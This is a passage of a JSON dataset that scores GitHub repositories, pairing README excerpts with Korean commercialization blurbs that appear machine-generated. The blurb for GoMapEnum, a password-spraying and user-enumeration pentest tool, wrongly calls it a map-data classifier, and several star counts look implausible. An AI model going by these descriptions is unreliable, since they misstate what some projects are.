`NetBSD`, `OpenBSD`, `Windows`.\n\nMailing list: [syzkaller@googlegroups.com](htt","composite_score":0.168,"license_safety_tag":"safe"},{"name":"serge-rider/dbeaver","github_url":"https://github.com/serge-rider/dbeaver","stars":8,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# DBeaver 저장소 분석\n\n## 왜 보물인가\n데이터베이스를 다루는 모든 전문가와 기업이 필요로 하는 '만능 데이터 관리 도구'로, 수백만 명이 이미 사용 중인 검증된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 기업용 데이터 분석 플랫폼으로 월 구독료 수금\n- 클라우드 기반 데이터베이스 관리 웹 서비스 출시\n\n**2. 내","readme_excerpt":"[![Twitter URL](https://img.shields.io/twitter/url/https/twitter.com/dbeaver_news.svg?style=social&label=Follow%20%40dbeaver_news)](https://twitter.com/dbeaver_news)\n[![Codacy Badge](https://app.codacy.com/project/badge/Grade/fa0bb9cf5a904c7d87424f8f6351ba92)](https://app.codacy.com/gh/dbeaver/dbeaver/dashboard?utm_source=gh&utm_medium=referral&utm_content=&utm_campaign=Badge_grade)\n[![Apache 2.0](https://img.shields.io/github/license/cronn-de/jira-sync.svg)](http://www.apache.org/licenses/LICENSE-2.0)\n[![Tickets in review](https://img.shields.io/github/issues/dbeaver/dbeaver/wait%20for%20review)](https://github.com/dbeaver/dbeaver/issues?q=is%3Aissue+is%3Aopen+label%3A\"wait%20for%20review\")\n<img src=\"https://github.com/dbeaver/dbeaver/wiki/images/dbeaver-icon-64x64.png\" align=\"right\"/>\n\n# DBeaver\n\nFree multi-platform database tool for developers, SQL programmers, database administrators and analysts.  \n\n* Has a lot of <a href=\"https://github.com/dbeaver/dbeaver/wiki\">features</a> incl","composite_score":0.1675,"license_safety_tag":"safe"},{"name":"sindresorhus/is-docker","github_url":"https://github.com/sindresorhus/is-docker","stars":14,"language":"JavaScript","license":"mit","abandonment_months":8,"description":"# is-docker 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 도커(클라우드 컨테이너)라는 특수한 환경에서 실행 중인지 자동으로 감지해주는 작은 도구로, 많은 소프트웨어 개발 회사들이 필요로 하는 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 배포 자동화 SaaS**: 고객의 서버 환경을 자동으로 감지하여 최적화된 설정을 제공하는 서비스\n2","readme_excerpt":"# is-docker\n\n> Check if the process is running inside a Docker container\n\n## Install\n\n```sh\nnpm install is-docker\n```\n\n## Usage\n\n```js\nimport isDocker from 'is-docker';\n\nif (isDocker()) {\n\tconsole.log('Running inside a Docker container');\n}\n```\n\n## CLI\n\n```sh\n$ is-docker\n```\n\nExits with code 0 if inside a Docker container and 2 if not.\n\n```sh\n$ is-docker && echo \"Running in Docker\" || echo \"Not running in Docker\"\n```\n\n## Related\n\n- [is-inside-container](https://github.com/sindresorhus/is-inside-container) - Check if the process is running inside a container\n","composite_score":0.1673,"license_safety_tag":"safe"},{"name":"thomasp85/ggfx","github_url":"https://github.com/thomasp85/ggfx","stars":11,"language":"R","license":"NOASSERTION","abandonment_months":9,"description":"","readme_excerpt":"\n<!-- README.md is generated from README.Rmd. Please edit that file -->\n\n# ggfx <a href='https://ggfx.data-imaginist.com'><img src='man/figures/logo.png' align=\"right\" height=\"138\" /></a>\n\n<!-- badges: start -->\n\n[![Lifecycle:\nexperimental](https://img.shields.io/badge/lifecycle-experimental-orange.svg)](https://lifecycle.r-lib.org/articles/stages.html#experimental)\n[![R-CMD-check](https://github.com/thomasp85/ggfx/actions/workflows/R-CMD-check.yaml/badge.svg)](https://github.com/thomasp85/ggfx/actions/workflows/R-CMD-check.yaml)\n[![Codecov test\ncoverage](https://codecov.io/gh/thomasp85/ggfx/graph/badge.svg)](https://app.codecov.io/gh/thomasp85/ggfx)\n<!-- badges: end -->\n\nggfx is a (currently experimantal) package that allows the use of\nvarious filters and shaders on ggplot2 layers.\n\n## Installation\n\nYou can install ggfx from CRAN in the usual manner\n(`install.packages('ggfx')`) or you can grab the development version\ndirectly from github using the devtools package:\n\n``` r\n# install.pa","composite_score":0.1673,"license_safety_tag":"unknown"},{"name":"php-fig/cache","github_url":"https://github.com/php-fig/cache","stars":6,"language":"PHP","license":"mit","abandonment_months":14,"description":"# PHP-FIG Cache 저장소 분석\n\n## 왜 보물인가\n웹사이트 속도를 높이고 서버 부하를 줄이기 위한 국제 표준 캐싱 규칙을 제공하는 기초 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **전자상거래 플랫폼**: 상품 목록, 가격 정보 등을 임시 저장해 빠른 로딩 속도 제공\n2. **콘텐츠 관리 시스템**: 뉴스 기사, 블로그 글 캐싱으로 서버 트래","readme_excerpt":"Caching Interface\n==============\n\nThis repository holds all interfaces related to [PSR-6 (Caching Interface)][psr-url].\n\nNote that this is not a Caching implementation of its own. It is merely interfaces that describe the components of a Caching mechanism.\n\nThe installable [package][package-url] and [implementations][implementation-url] are listed on Packagist.\n\n[psr-url]: https://www.php-fig.org/psr/psr-6/\n[package-url]: https://packagist.org/packages/psr/cache\n[implementation-url]: https://packagist.org/providers/psr/cache-implementation\n","composite_score":0.1672,"license_safety_tag":"safe"},{"name":"malcolmbarrett/causal_inference_r_workshop","github_url":"https://github.com/malcolmbarrett/causal_inference_r_workshop","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":8,"description":"# causal_inference_r_workshop 분석\n\n## 왜 보물인가\n데이터 분석가들이 원인과 결과의 진정한 관계를 찾아내는 방법을 체계적으로 배울 수 있는 실용 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 마케팅 효과 측정 플랫폼 - 광고가 실제 매출 증가를 일으켰는지 판단하는 분석 도구\n2. **내부 업무 도구**","readme_excerpt":"\n\n<!-- README.md is generated from README.Rmd. Please edit that file -->\n\n## Causal Inference in R Workshop\n\n### Slides\n\n- [00\n  Intro](https://causal-inference-r-workshop.netlify.app/00-intro.html)\n- [01 Whole\n  Game](https://causal-inference-r-workshop.netlify.app/01-causal_modeling_whole_game.html)\n- [02 When Standard Methods\n  Succeed](https://causal-inference-r-workshop.netlify.app/02-when-standard-methods-succeed.html)\n- [03 Causal Inference with `group_by` and\n  `summarise`](https://causal-inference-r-workshop.netlify.app/03-causal-inference-with-group-by-and-summarise.html)\n- [04 Causal\n  Diagrams](https://causal-inference-r-workshop.netlify.app/04-dags.html)\n- [05 Causal Inference is Not Just a Statistics\n  Problem](https://causal-inference-r-workshop.netlify.app/05-quartets.html)\n- [06 Introduction to Propensity\n  Scores](https://causal-inference-r-workshop.netlify.app/06-pscores.html)\n- [07 Using Propensity\n  Scores](https://causal-inference-r-workshop.netlify.app/07-using-p","composite_score":0.1671,"license_safety_tag":"unknown"},{"name":"davidkpiano/xstate","github_url":"https://github.com/davidkpiano/xstate","stars":13,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# XState 저장소 분석\n\n## 왜 보물인가\n복잡한 앱의 상태 변화를 체계적으로 관리하는 표준 도구로, 소프트웨어 개발의 가장 어려운 부분 중 하나를 단순하게 해결합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 결제 흐름, 주문 처리 같은 단계별 프로세스가 있는 웹 애플리케이션에 내장\n2. **내부 업무 도구**: 직원 승인 프로세스","readme_excerpt":"<p align=\"center\">\n  <br />\n\n  <picture>\n    <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://raw.githubusercontent.com/statelyai/public-assets/main/logos/xstate-logo-white-nobg.svg\">\n    <img alt=\"XState logotype\" src=\"https://raw.githubusercontent.com/statelyai/public-assets/main/logos/xstate-logo-black-nobg.svg\" width=\"200\">\n  </picture>\n  <br />\n    <strong>Actor-based state management & orchestration for complex app logic.</strong> <a href=\"https://stately.ai/docs\">→ Documentation</a>\n  <br />\n  <br />\n</p>\n\nXState is a state management and orchestration solution for JavaScript and TypeScript apps. It has _zero_ dependencies, and is useful for frontend and backend application logic.\n\nIt uses event-driven programming, state machines, statecharts, and the actor model to handle complex logic in predictable, robust, and visual ways. XState provides a powerful and flexible way to manage application and workflow state by allowing developers to model logic as actors and state","composite_score":0.1667,"license_safety_tag":"safe"},{"name":"Uniswap/uniswap-v2-core","github_url":"https://github.com/Uniswap/uniswap-v2-core","stars":8,"language":"TypeScript","license":"GPL-3.0","abandonment_months":2,"description":"# Uniswap V2 Core 분석\n\n## 왜 보물인가\n암호화폐 거래소의 핵심 기술을 담은 오픈소스로, 전 세계 수십억 달러의 거래가 이 코드 위에서 일어나고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래 플랫폼 SaaS**: 중소 거래소가 자체 플랫폼을 빠르게 구축할 수 있도록 화이트라벨 솔루션으로 판매\n2. **자동 거래 봇 API**:","readme_excerpt":"# Uniswap V2\n\n[![Actions Status](https://github.com/Uniswap/uniswap-v2-core/workflows/CI/badge.svg)](https://github.com/Uniswap/uniswap-v2-core/actions)\n[![Version](https://img.shields.io/npm/v/@uniswap/v2-core)](https://www.npmjs.com/package/@uniswap/v2-core)\n\nIn-depth documentation on Uniswap V2 is available at [uniswap.org](https://uniswap.org/docs).\n\nThe built contract artifacts can be browsed via [unpkg.com](https://unpkg.com/browse/@uniswap/v2-core@latest/).\n\n# Local Development\n\nThe following assumes the use of `node@>=10`.\n\n## Install Dependencies\n\n`yarn`\n\n## Compile Contracts\n\n`yarn compile`\n\n## Run Tests\n\n`yarn test`\n","composite_score":0.1662,"license_safety_tag":"restricted"},{"name":"phanan/koel","github_url":"https://github.com/phanan/koel","stars":5,"language":"PHP","license":"mit","abandonment_months":0,"description":"# Koel 저장소 분석\n\n## 왜 보물인가\n음악 애호가들이 자신의 음악 컬렉션을 온라인에서 직접 관리하고 어디서나 들을 수 있는 개인 음악 스트리밍 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 음악 보관함 구독 서비스 (월 $5~10 가격대로 운영)\n2. **내부 업무 도구**: 음악 제작사나 레이블의 곡 보관 및 검수 시","readme_excerpt":"# koel [![Frontend Unit Tests](https://github.com/koel/koel/actions/workflows/unit-frontend.yml/badge.svg)](https://github.com/koel/koel/actions/workflows/unit-frontend.yml) ![Code Quality](https://scrutinizer-ci.com/g/phanan/koel/badges/quality-score.png?b=master) [![codecov](https://codecov.io/gh/koel/koel/branch/master/graph/badge.svg)](https://codecov.io/gh/koel/koel) [![OpenCollective](https://opencollective.com/koel/backers/badge.svg)](#backers) [![OpenCollective](https://opencollective.com/koel/sponsors/badge.svg)](#sponsors)\n\n![Showcase](https://user-images.githubusercontent.com/8056274/115028055-bc02a280-9ec4-11eb-991c-69cd2a45b69c.png)\n\n## Intro\n\n**Koel** (also stylized as **koel**, with a lowercase k) is a simple web-based personal audio streaming service written\nin [Vue](http://vuejs.org/) on the client side and [Laravel](http://laravel.com/) on the server side. Targeting web\ndevelopers, Koel embraces some of the more modern web technologies to do its job.\n\n## Install and U","composite_score":0.1656,"license_safety_tag":"safe"},{"name":"zricethezav/gitleaks","github_url":"https://github.com/zricethezav/gitleaks","stars":6,"language":"Go","license":"MIT","abandonment_months":0,"description":"# Gitleaks 상용화 분석\n\n## 왜 보물인가\n기업 내부에서 실수로 공개된 민감한 정보(비밀번호, API 키 등)를 자동으로 찾아내는 보안 도구로, 데이터 유출 사고를 미리 예방할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 깃허브/깃랩 연동 보안 검사 플랫폼으로 월 구독료 받기\n- **내부 업무 도구**: 회사 전체 코드 저","readme_excerpt":"# Gitleaks\n\n```\n┌─○───┐\n│ │╲  │\n│ │ ○ │\n│ ○ ░ │\n└─░───┘\n```\n\n[license]: ./LICENSE\n[badge-license]: https://img.shields.io/github/license/gitleaks/gitleaks.svg\n[go-docs-badge]: https://pkg.go.dev/badge/github.com/gitleaks/gitleaks/v8?status\n[go-docs]: https://pkg.go.dev/github.com/zricethezav/gitleaks/v8\n[badge-build]: https://github.com/gitleaks/gitleaks/actions/workflows/test.yml/badge.svg\n[build]: https://github.com/gitleaks/gitleaks/actions/workflows/test.yml\n[go-report-card-badge]: https://goreportcard.com/badge/github.com/gitleaks/gitleaks/v8\n[go-report-card]: https://goreportcard.com/report/github.com/gitleaks/gitleaks/v8\n[dockerhub]: https://hub.docker.com/r/zricethezav/gitleaks\n[dockerhub-badge]: https://img.shields.io/docker/pulls/zricethezav/gitleaks.svg\n[gitleaks-action]: https://github.com/gitleaks/gitleaks-action\n[gitleaks-badge]: https://img.shields.io/badge/protected%20by-gitleaks-blue\n\n\n[![GitHub Action Test][badge-build]][build]\n[![Docker Hub][dockerhub-badge]][dockerh","composite_score":0.1655,"license_safety_tag":"safe"},{"name":"elecV2/elecV2P","github_url":"https://github.com/elecV2/elecV2P","stars":8,"language":"Vue","license":"unknown","abandonment_months":8,"description":"# elecV2/elecV2P 분석 보고서\n\n## 왜 보물인가\n복잡한 자동화 작업을 웹 인터페이스에서 직관적으로 설정할 수 있는 개인용 자동화 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 자동화 작업 클라우드 플랫폼으로 제공 (월 구독료로 서버 비용 회수)\n2. **내부 업무 도구**: 중소 회사의 정보 수집, 알림, 정기","readme_excerpt":"## 简介\r\n\r\nelecV2P - customize personal network.\r\n一款基于 NodeJS，可通过 JS 修改网络请求，以及定时运行脚本或 SHELL 指令的网络工具。\r\n\r\n![elecV2P overview/预览](https://raw.githubusercontent.com/elecV2/elecV2P-dei/master/docs/res/overview.png)\r\n\r\n### 基础功能\r\n\r\n- 查看/修改网络请求 (MITM)\r\n- 定时执行 JS/SHELL 脚本\r\n- FEED/IFTTT/自定义 通知\r\n- EFSS 基础文件管理\r\n\r\n## 安装/INSTALL\r\n\r\n***程序开放权限极大，建议局域网使用。公网部署（务必参考 [Advanced.md](https://github.com/elecV2/elecV2P-dei/blob/master/docs/Advanced.md)），风险自负***\r\n\r\n*elecV2P 所有文件及依赖总大小约 90 M。初始运行时内存占用约 90 M，运行 100 个定时任务时总内存占用约 150 M（仅供参考，不同软硬件条件下程序调用资源可能有所不同）*\r\n\r\n**在可使用 Docker 的情况下，推荐使用方法三进行安装**\r\n\r\n### 方法一：直接 NODEJS 运行\r\n\r\n**需求 NODEJS 版本 (node -v) >= 14.17.0**\r\n\r\n``` sh\r\ngit clone https://github.com/elecV2/elecV2P.git\r\ncd elecV2P\r\n\r\n# 安装依赖库（根据网络环境和硬盘读写速度，需要 1-10 分钟不等\r\nyarn\r\n\r\n# elecV2P 默认以 pm2 的方式启动，需要先安装好 pm2\r\n# pm2 的安装方式:\r\n# 1. 添加 elecV2P 所在目录/node_modules/.bin 到系统环境变量 PATH 中\r\n# 2. 或者直接执行 yarn global add pm2\r\n# 然后执行命令\r\nyarn start\r\n\r\n# 其他基础方式启动命令\r\nnode index.js\r\n# 假如提示 80 端口不可用，尝试命令\r\n# windows 平台 CMD:\r\n# set PORT=","composite_score":0.1654,"license_safety_tag":"unknown"},{"name":"Carthage/Carthage","github_url":"https://github.com/Carthage/Carthage","stars":6,"language":"Swift","license":"NOASSERTION","abandonment_months":9,"description":"# Carthage 저장소 분석\n\n## 왜 보물인가\n앱 개발에 필요한 외부 라이브러리를 자동으로 관리해주는 도구로, 개발자들의 반복적인 수작업을 줄여줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 앱 개발사들을 위한 자동 라이브러리 관리 클라우드 플랫폼\n- **내부 업무 도구**: 대규모 앱 개발 회사의 개발팀 효율화 솔루션\n- **API ","readme_excerpt":"![](Logo/PNG/header.png)\n\n# Carthage [![GitHub license](https://img.shields.io/badge/license-MIT-lightgrey.svg)](https://raw.githubusercontent.com/Carthage/Carthage/master/LICENSE.md) [![GitHub release](https://img.shields.io/github/release/carthage/carthage.svg)](https://github.com/Carthage/Carthage/releases) [![Reviewed by Hound](https://img.shields.io/badge/Reviewed_by-Hound-8E64B0.svg)](https://houndci.com)\n\nCarthage is intended to be the simplest way to add frameworks to your Cocoa application.\n\nCarthage builds your dependencies and provides you with binary frameworks, but you retain full control over your project structure and setup. Carthage does not automatically modify your project files or your build settings.\n\n- [Quick Start](#quick-start)\n- [Installing Carthage](#installing-carthage)\n- [Adding frameworks to an application](#adding-frameworks-to-an-application)\n\t- [Getting started](#getting-started)\n\t\t- [Building platform-independent XCFrameworks](#building-platform-independ","composite_score":0.1648,"license_safety_tag":"unknown"},{"name":"geohot/tinygrad","github_url":"https://github.com/geohot/tinygrad","stars":10,"language":"Python","license":"MIT","abandonment_months":0,"description":"# geohot/tinygrad 사업화 분석\n\n## 왜 보물인가\n복잡한 인공지능 프로그램을 누구나 쉽게 만들 수 있도록 돕는 기초 도구로, 기술 진입장벽을 크게 낮춥니다.\n\n## 어디에 쓸 수 있나\n1. **AI 개발 플랫폼 SaaS**: 중소 스타트업이 별도 인프라 투자 없이 인공지능 모델을 구축·배포할 수 있는 클라우드 서비스\n2. **기업 AI 솔루션","readme_excerpt":"<div align=\"center\">\n\n<picture>\n  <source media=\"(prefers-color-scheme: light)\" srcset=\"/docs/logo_tiny_light.svg\">\n  <img alt=\"tiny corp logo\" src=\"/docs/logo_tiny_dark.svg\" width=\"50%\" height=\"50%\">\n</picture>\n\ntinygrad: For something between [PyTorch](https://github.com/pytorch/pytorch) and [karpathy/micrograd](https://github.com/karpathy/micrograd). Maintained by [tiny corp](https://tinygrad.org).\n\n<h3>\n\n[Homepage](https://github.com/tinygrad/tinygrad) | [Documentation](https://docs.tinygrad.org/) | [Discord](https://discord.gg/ZjZadyC7PK)\n\n</h3>\n\n[![GitHub Repo stars](https://img.shields.io/github/stars/tinygrad/tinygrad)](https://github.com/tinygrad/tinygrad/stargazers)\n[![Unit Tests](https://github.com/tinygrad/tinygrad/actions/workflows/test.yml/badge.svg)](https://github.com/tinygrad/tinygrad/actions/workflows/test.yml)\n[![Discord](https://img.shields.io/discord/1068976834382925865)](https://discord.gg/ZjZadyC7PK)\n\n</div>\n\n---\n\ntinygrad is an end-to-end deep learning stack:\n\n-","composite_score":0.1646,"license_safety_tag":"safe"},{"name":"apache/incubator-brpc","github_url":"https://github.com/apache/incubator-brpc","stars":11,"language":"C++","license":"Apache-2.0","abandonment_months":0,"description":"# Apache brpc 프로젝트 분석\n\n## 왜 보물인가\n인터넷 서비스들이 서로 빠르고 안정적으로 통신할 수 있게 해주는 기본 인프라로, 대규모 데이터센터와 클라우드 서비스의 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 SaaS 서비스**: 여러 서버 간 빠른 데이터 주고받기가 필요한 협업 도구나 데이터 분석 플랫폼\n2. **내부 업무 ","readme_excerpt":"[中文版](README_cn.md)\n\n[![Linux Build Status](https://github.com/apache/brpc/actions/workflows/ci-linux.yml/badge.svg)](https://github.com/apache/brpc/actions/workflows/ci-linux.yml)\n[![MacOs Build Status](https://github.com/apache/brpc/actions/workflows/ci-macos.yml/badge.svg)](https://github.com/apache/brpc/actions/workflows/ci-macos.yml)\n\n![brpc logo (light)](docs/images/logo.png#gh-light-mode-only)\n![brpc logo (dark)](docs/images/logo-white.png#gh-dark-mode-only)\n\n[bRPC](https://brpc.apache.org/) is an Industrial-grade RPC framework using C++ Language, which is often used in  high performance system such as Search, Storage, Machine learning, Advertisement, Recommendation etc.\n\n### \"bRPC\" means \"better RPC\". \n\nYou can use it to:\n* Build a server that can talk in multiple protocols (**on same port**), or access all sorts of services\n  * restful http/https, [h2](https://httpwg.org/specs/rfc9113.html)/[gRPC](https://grpc.io). using http/h2 in bRPC is much more friendly than [libcurl](htt","composite_score":0.1645,"license_safety_tag":"safe"},{"name":"ydcss/vue-ydui","github_url":"https://github.com/ydcss/vue-ydui","stars":6,"language":"Vue","license":"mit","abandonment_months":12,"description":"# vue-ydui 상용화 분석 보고서\n\n## 왜 보물인가\nVue 기반의 웹 디자인 도구모음으로, 웹사이트나 앱을 만드는 개발자들이 빠르게 인터페이스를 구축할 수 있도록 돕는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 빌더 SaaS**: 코딩 없이 웹사이트를 만드는 플랫폼(Wix 같은)의 기반 기술로 활용\n2. **기업 내부 업무 도구**: 회사 ","readme_excerpt":"<p align=\"center\">\n    <br>\n    <a href=\"http://vue.ydui.org\">\n        <img width=\"200\" src=\"http://static.ydcss.com/ydui/img/logo.png\">\n    </a>\n    <br>\n</p>\n<br/>\n\n#### 一只基于Vue2.x的移动端&微信UI。 -YDUI Touch\n\nHome: <a href=\"http://vue.ydui.org\"> http://vue.ydui.org </a>  \nDocs: <a href=\"http://vue.ydui.org/docs\"> http://vue.ydui.org/docs </a>  \nBlog: <a href=\"http://www.ydcss.com\"> http://www.ydcss.com </a>  \n\n#### 请用扫码查看\n<img width=\"180\" height=\"180\" src=\"http://static.ydcss.com/ydui/img/qrcode.jpg\" />\n\n#### 开发\n\n```shell\n1. npm install\n\n2. npm run dev\n\n3. http://127.0.0.1:4321\n```\n\n#### 参考、使用的项目\n\n* <a href=\"https://github.com/ftlabs/fastclick\" target=\"_blank\">[fastclick]</a> (<a href=\"https://github.com/ftlabs/fastclick/blob/master/LICENSE\" target=\"_blank\">[MIT License]</a>)\n* <a href=\"https://github.com/inorganik/CountUp.js\" target=\"_blank\">[countup.js]</a> (<a href=\"https://github.com/inorganik/countUp.js/blob/master/LICENSE.md\" target=\"_blank\">[MIT License]</a>)\n* <a href=\"https://git","composite_score":0.1644,"license_safety_tag":"safe"},{"name":"brpc/brpc","github_url":"https://github.com/brpc/brpc","stars":7,"language":"C++","license":"apache-2.0","abandonment_months":0,"description":"# brpc/brpc 저장소 분석\n\n## 왜 보물인가\n인터넷 서비스들이 서로 빠르고 안정적으로 대화하기 위한 기반 기술로, 대규모 온라인 서비스의 backbone 역할을 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 협업 도구(Slack, Notion 같은)의 서버 간 통신 인프라 제공\n- **내부 업무 도구**: 대기업의 ","readme_excerpt":"[中文版](README_cn.md)\n\n[![Linux Build Status](https://github.com/apache/brpc/actions/workflows/ci-linux.yml/badge.svg)](https://github.com/apache/brpc/actions/workflows/ci-linux.yml)\n[![MacOs Build Status](https://github.com/apache/brpc/actions/workflows/ci-macos.yml/badge.svg)](https://github.com/apache/brpc/actions/workflows/ci-macos.yml)\n\n![brpc logo (light)](docs/images/logo.png#gh-light-mode-only)\n![brpc logo (dark)](docs/images/logo-white.png#gh-dark-mode-only)\n\n[bRPC](https://brpc.apache.org/) is an Industrial-grade RPC framework using C++ Language, which is often used in  high performance system such as Search, Storage, Machine learning, Advertisement, Recommendation etc.\n\n### \"bRPC\" means \"better RPC\". \n\nYou can use it to:\n* Build a server that can talk in multiple protocols (**on same port**), or access all sorts of services\n  * restful http/https, [h2](https://httpwg.org/specs/rfc9113.html)/[gRPC](https://grpc.io). using http/h2 in bRPC is much more friendly than [libcurl](htt","composite_score":0.1644,"license_safety_tag":"safe"},{"name":"sogou/srpc","github_url":"https://github.com/sogou/srpc","stars":6,"language":"C++","license":"Apache-2.0","abandonment_months":2,"description":"# sogou/srpc 분석 보고서\n\n## 왜 보물인가\n웹서비스 간 데이터를 빠르고 안정적으로 주고받는 기반 기술로, 대규모 서비스를 운영하는 기업들이 반드시 필요로 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 여러 고객사 데이터를 동시에 처리하는 클라우드 기반 협업 도구의 백엔드 기술\n- **내부 업무 도구**: 대형 기업의 여러 부서","readme_excerpt":"[中文版入口](README_cn.md)\n\n<br/>\n<img src=\"https://raw.githubusercontent.com/wiki/sogou/srpc/srpc-logo-min.png\" width = \"140\" height = \"40\" alt=\"srpc-logo\"/>\n\n<a href=\"https://github.com/sogou/srpc/blob/master/LICENSE\"><img src=\"https://img.shields.io/github/license/sogou/srpc?color=379c9c&style=flat-square\"/></a>\n<a href=\"https://en.cppreference.com/\"><img src=\"https://img.shields.io/badge/language-C++-black.svg?color=379c9c&style=flat-square\"/></a>\n<a href=\"https://img.shields.io/badge/platform-linux%20%7C%20macos%20%7C%20windows-black.svg?color=379c9c&style=flat-square\"><img src=\"https://img.shields.io/badge/platform-linux%20%7C%20macos%20%7C%20windows-black.svg?color=379c9c&style=flat-square\"/></a>\n<a href=\"https://github.com/sogou/srpc/releases\"><img src=\"https://img.shields.io/github/v/release/sogou/srpc?color=379c9c&logoColor=ffffff&style=flat-square\"/></a>\n<a href=\"https://github.com/sogou/srpc/actions?query=workflow%3A%22ci+build%22++\"><img src=\"https://img.shields.io/github/actio","composite_score":0.1643,"license_safety_tag":"safe"},{"name":"MeadowlarkDAW/Meadowlark","github_url":"https://github.com/MeadowlarkDAW/Meadowlark","stars":16,"language":"","license":"AGPL-3.0","abandonment_months":8,"description":"# Meadowlark DAW 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 음악을 만들 수 있는 무료 음악 제작 소프트웨어로, 전문적인 음악 편집 도구를 대중화할 수 있는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 음악 제작 플랫폼**\n웹 브라우저에서 바로 음악을 만들 수 있는 구독형 서비스로 운영하여, 복잡한 설치 없이 누구나 접근 ","readme_excerpt":"<div align=\"center\">\n<img src=\"./assets/branding/meadowlark-logo-128.png\" width=\"64px\" height=\"64px\"/><h1>Meadowlark</h1>\n\n[![AGPLv3](https://img.shields.io/badge/license-AGPL-3)](./LICENSE)\n[![Discord](https://img.shields.io/discord/854818272788348958.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2)](https://discord.gg/2W3Xvc8wy4)\n\nMeadowlark is a (work in progress) FREE and open-source DAW (Digital Audio Workstation) for Linux, Mac and Windows. It aims to be a powerful recording, composing, editing, sound designing, mixing, and mastering tool for artists around the world, while also being intuitive and customizable.\n\nThis project has moved to [Codeberg](https://codeberg.org/Meadowlark/Meadowlark).\n\n</div>\n\n> If you wish to see the old code, it is in the `old` and `dev-(old)` branches.\n\n","composite_score":0.1641,"license_safety_tag":"risky"},{"name":"Johx22/Patch-Recovery","github_url":"https://github.com/Johx22/Patch-Recovery","stars":206,"language":"Python","license":"NOASSERTION","abandonment_months":5,"description":"","readme_excerpt":"","composite_score":0.164,"license_safety_tag":"unknown"},{"name":"leachim6/hello-world","github_url":"https://github.com/leachim6/hello-world","stars":5,"language":"Assembly","license":"MIT","abandonment_months":4,"description":"# leachim6/hello-world 분석\n\n## 왜 보물인가\n프로그래밍 입문자들이 자신의 첫 코드를 세상에 공개하는 환영의 장으로, 전 세계 개발자들의 시작점을 기록하는 커뮤니티 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 학습 플랫폼**: 신입 개발자들이 배운 내용을 바로 실습하고 결과물을 공유하는 학습 커뮤니티\n2. **기업 신입 ","readme_excerpt":"# Hello World\n\nHello World in every computer language.\n\nAs I watch the collection expand, this project has blown up more than I ever thought possible.\nThanks to everyone who continues to contribute; new languages are created every day!\n\nMake sure to see [contributing.md](/contributing.md) for instructions on contributing to the project!\n\n<!--Languages start-->\n## Languages (1009 total)\n\n* [!](%23/%21)\n* [!@#$%^&*()_+](%23/%21%40%23%24%25%5E%26%E2%88%97%28%29_%2B)\n* [():;#?!](%23/%28%29%CB%B8%3B%23%EF%BC%9F%21)\n* [0(nop^)](%23/0%28nop%5E%29)\n* [0587](%23/0587)\n* [05AB1E](%23/05AB1E)\n* [0815](%23/0815.0815)\n* [1+](%23/1%2B)\n* [123](%23/123)\n* [1C Enterprise](%23/1C%20Enterprise)\n* [256](%23/256.256)\n* [2B](%23/2B.2b)\n* [420](%23/420.420)\n* [4gl](%23/4gl.4gl)\n* [4test](%23/4test)\n* [4th Dimension](%23/4th%20Dimension.4dd)\n* [6969 Assembler](%23/6969%20Assembler)\n* [8th](%23/8th)\n* [@tention!](%23/%40tention%21)\n* [@text](%23/%40text)\n* [~English](%23/~English)\n* [μλ](%23/%CE%BC%CE%BB)\n* [","composite_score":0.164,"license_safety_tag":"safe"},{"name":"nodauf/GoMapEnum","github_url":"https://github.com/nodauf/GoMapEnum","stars":18,"language":"Go","license":"GPL-3.0","abandonment_months":8,"description":"# GoMapEnum 프로젝트 분석\n\n## 왜 보물인가\n지도 데이터를 자동으로 분류하고 정리하는 기술로, 위치 기반 서비스를 제공하는 회사들이 수작업 없이 대규모 지도 정보를 관리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **배달앱/지도 서비스**: 음식점, 카페 등 장소를 자동으로 카테고리별로 분류하여 검색 기능 강화\n- **부동산 플랫폼**:","readme_excerpt":"[![Goland card](https://goreportcard.com/badge/github.com/nodauf/GoMapEnum)](https://goreportcard.com/report/github.com/nodauf/GoMapEnum)\n\n_This project was originally written to learn Golang and explore the different ways I've encountered when pentesting to enumerate or brute force users and write them together. If you have any errors, feel free to create an issue and I'll do my best to fix them or improve the tools._\n# GoMapEnum\n\nNothing new but existing techniques are brought together in one tool.\n\n*The screenshot below are not up-to-date and the command line have changed*\n\n## Description\n\n### Summary\nThe recommended module is o365 for user enumeration and passwords bruteforce / spray . Additional information can be retrieved to avoid account lockout, to know that the password is good but expired, MFA enabled,...\n\n\n### Linkedin\nThis module should be used to retrieve a list of email addresses before validating them through a user enumeration module.\nThe company will be searched on Li","composite_score":0.1631,"license_safety_tag":"restricted"},{"name":"inket/MacSymbolicator","github_url":"https://github.com/inket/MacSymbolicator","stars":5,"language":"Swift","license":"gpl-2.0","abandonment_months":8,"description":"# MacSymbolicator 상용화 분석\n\n## 왜 보물인가\nMac 프로그램이 충돌할 때 나타나는 암호화된 오류 메시지를 사람이 읽을 수 있는 형태로 변환해주는 도구로, 소프트웨어 개발사와 사용자 모두에게 